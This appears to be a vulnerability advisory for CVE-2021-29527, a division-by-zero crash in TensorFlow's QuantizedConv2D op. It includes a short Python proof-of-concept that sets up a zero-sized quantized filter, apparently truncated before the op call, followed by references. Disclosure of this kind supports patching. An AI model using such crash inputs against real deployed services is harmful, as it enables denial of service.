CVE-2021-29527: Division by 0 in `QuantizedConv2D`
(updated )
An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D:
import tensorflow as tf
input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8)
filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8)
min_input = tf.constant(0.0)
max_input = tf.constant(0.0001)
min_filter = tf.constant(0.0)
max_filter = tf.constant(0.0001)
strides = [1, 1, 1, 1]
padding = "SAME"
References
- github.com/advisories/GHSA-x4g7-fvjj-prg8
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-455.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-653.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-164.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/cfa91be9863a91d5105a3b4941096044ab32036b
- github.com/tensorflow/tensorflow/security/advisories/GHSA-x4g7-fvjj-prg8
- nvd.nist.gov/vuln/detail/CVE-2021-29527
Detect and mitigate CVE-2021-29527 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →